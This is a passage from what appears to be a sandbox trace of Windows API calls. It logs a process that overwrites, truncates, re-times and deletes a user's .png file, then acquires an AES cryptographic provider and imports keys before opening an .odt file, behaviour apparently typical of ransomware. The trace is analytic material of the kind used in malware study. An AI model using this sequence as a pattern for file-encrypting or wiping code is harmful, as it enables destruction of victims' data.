lpNumberOfBytesWritten=0x1bf5ceb8, lpOverlapped=0x0 | out: lpBuffer=0x21f13e8*, lpNumberOfBytesWritten=0x1bf5ceb8*=0x77d, lpOverlapped=0x0) returned 1 [0070.826] CloseHandle (hObject=0x384) returned 1 [0070.827] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", lpFilePart=0x0) returned 0x47 [0070.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d170) returned 1 [0070.827] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\dky3q8wobxc nmakc5d.png"), fInfoLevelId=0x0, lpFileInformation=0x1bf5d250 | out: lpFileInformation=0x1bf5d250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbac8d470, ftCreationTime.dwHighDateTime=0x1d4c811, ftLastAccessTime.dwLowDateTime=0x4c31df90, ftLastAccessTime.dwHighDateTime=0x1d4cd7d, ftLastWriteTime.dwLowDateTime=0x4c31df90, ftLastWriteTime.dwHighDateTime=0x1d4cd7d, nFileSizeHigh=0x0, nFileSizeLow=0x1594a)) returned 1 [0070.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d130) returned 1 [0070.827] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", lpFilePart=0x0) returned 0x47 [0070.827] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", dwFileAttributes=0x80) returned 1 [0070.827] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", lpFilePart=0x0) returned 0x47 [0070.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d1b0) returned 1 [0070.827] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\dky3q8wobxc nmakc5d.png"), fInfoLevelId=0x0, lpFileInformation=0x21f9010 | out: lpFileInformation=0x21f9010*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbac8d470, ftCreationTime.dwHighDateTime=0x1d4c811, ftLastAccessTime.dwLowDateTime=0x4c31df90, ftLastAccessTime.dwHighDateTime=0x1d4cd7d, ftLastWriteTime.dwLowDateTime=0x4c31df90, ftLastWriteTime.dwHighDateTime=0x1d4cd7d, nFileSizeHigh=0x0, nFileSizeLow=0x1594a)) returned 1 [0070.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d170) returned 1 [0070.827] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", nBufferLength=0x105, lpBuffer=0x1bf5cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", lpFilePart=0x0) returned 0x47 [0070.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0a0) returned 1 [0070.827] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\dky3q8wobxc nmakc5d.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.828] GetFileType (hFile=0x384) returned 0x1 [0070.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d010) returned 1 [0070.828] GetFileType (hFile=0x384) returned 0x1 [0070.828] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0070.829] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.829] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.830] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.831] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.832] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.832] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.833] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.834] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.835] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.835] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.836] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.837] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.838] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.838] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.840] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.840] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.841] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.842] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.843] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.844] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.844] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.887] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1a8*=0xa00, lpOverlapped=0x0) returned 1 [0070.887] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0070.888] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.889] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.890] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.890] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.891] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.892] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.893] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.893] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.894] WriteFile (in: hFile=0x384, lpBuffer=0x21f94f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f94f8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0070.896] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0070.896] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0070.897] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0070.897] SetEndOfFile (hFile=0x384) returned 1 [0070.898] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0070.898] CloseHandle (hObject=0x384) returned 1 [0070.899] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", lpFilePart=0x0) returned 0x47 [0070.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0070.899] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\dky3q8wobxc nmakc5d.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.899] GetFileType (hFile=0x384) returned 0x1 [0070.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0070.899] GetFileType (hFile=0x384) returned 0x1 [0070.899] SetFileTime (hFile=0x384, lpCreationTime=0x1bf5d278, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0070.899] CloseHandle (hObject=0x384) returned 1 [0070.899] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", lpFilePart=0x0) returned 0x47 [0070.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0070.899] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\dky3q8wobxc nmakc5d.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.899] GetFileType (hFile=0x384) returned 0x1 [0070.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0070.899] GetFileType (hFile=0x384) returned 0x1 [0070.899] SetFileTime (hFile=0x384, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d278, lpLastWriteTime=0x0) returned 1 [0070.899] CloseHandle (hObject=0x384) returned 1 [0070.900] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", lpFilePart=0x0) returned 0x47 [0070.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0070.900] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\dky3q8wobxc nmakc5d.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.900] GetFileType (hFile=0x384) returned 0x1 [0070.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0070.900] GetFileType (hFile=0x384) returned 0x1 [0070.900] SetFileTime (hFile=0x384, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d278) returned 1 [0070.900] CloseHandle (hObject=0x384) returned 1 [0070.900] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", lpFilePart=0x0) returned 0x47 [0070.900] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\dky3q8wobxc nmakc5d.png")) returned 1 [0070.901] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", lpFilePart=0x0) returned 0x47 [0070.901] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\81CABD95083BDA1463F62818BFBCB701", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\81CABD95083BDA1463F62818BFBCB701", lpFilePart=0x0) returned 0x50 [0070.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0070.901] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\81CABD95083BDA1463F62818BFBCB701" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\81cabd95083bda1463f62818bfbcb701"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.901] GetFileType (hFile=0x384) returned 0x1 [0070.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0070.901] GetFileType (hFile=0x384) returned 0x1 [0070.901] SetFileTime (hFile=0x384, lpCreationTime=0x1bf5d318, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0070.901] CloseHandle (hObject=0x384) returned 1 [0070.913] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\81CABD95083BDA1463F62818BFBCB701", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\81CABD95083BDA1463F62818BFBCB701", lpFilePart=0x0) returned 0x50 [0070.913] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0070.913] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\81CABD95083BDA1463F62818BFBCB701" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\81cabd95083bda1463f62818bfbcb701"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.913] GetFileType (hFile=0x384) returned 0x1 [0070.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0070.913] GetFileType (hFile=0x384) returned 0x1 [0070.914] SetFileTime (hFile=0x384, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d318, lpLastWriteTime=0x0) returned 1 [0070.914] CloseHandle (hObject=0x384) returned 1 [0070.914] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\81CABD95083BDA1463F62818BFBCB701", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\81CABD95083BDA1463F62818BFBCB701", lpFilePart=0x0) returned 0x50 [0070.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0070.914] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\81CABD95083BDA1463F62818BFBCB701" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\81cabd95083bda1463f62818bfbcb701"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0070.914] SetFileTime (hFile=0x384, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d318) returned 1 [0070.916] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", lpFilePart=0x0) returned 0x47 [0070.918] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", lpFilePart=0x0) returned 0x47 [0070.920] CryptAcquireContextW (in: phProv=0x1bf5d168, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5d168*=0x1a5b6e10) returned 1 [0070.921] CryptImportKey (in: hProv=0x1a5b6e10, pbData=0x2211368, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d120 | out: phKey=0x1bf5d120*=0x1a626bb0) returned 1 [0070.921] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0070.921] CryptExportKey (in: hKey=0x1a626bb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5d230 | out: pbData=0x0*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0070.921] CryptExportKey (in: hKey=0x1a626bb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2211458, pdwDataLen=0x1bf5d230 | out: pbData=0x2211458*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0070.921] CryptImportKey (in: hProv=0x1a5b6e10, pbData=0x2211578, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d0f0 | out: phKey=0x1bf5d0f0*=0x1a626a60) returned 1 [0070.921] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0070.921] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0070.921] CryptDuplicateKey (in: hKey=0x1a626a60, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d0e0 | out: phKey=0x1bf5d0e0*=0x1a626c20) returned 1 [0070.921] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0070.921] CryptSetKeyParam (hKey=0x1a626c20, dwParam=0x4, pbData=0x22116c0*=0x1, dwFlags=0x0) returned 1 [0070.922] CryptSetKeyParam (hKey=0x1a626c20, dwParam=0x1, pbData=0x2211670, dwFlags=0x0) returned 1 [0070.922] CryptDestroyKey (hKey=0x1a626a60) returned 1 [0070.922] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0070.922] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", lpFilePart=0x0) returned 0x47 [0070.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0070.922] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt" (normalized: 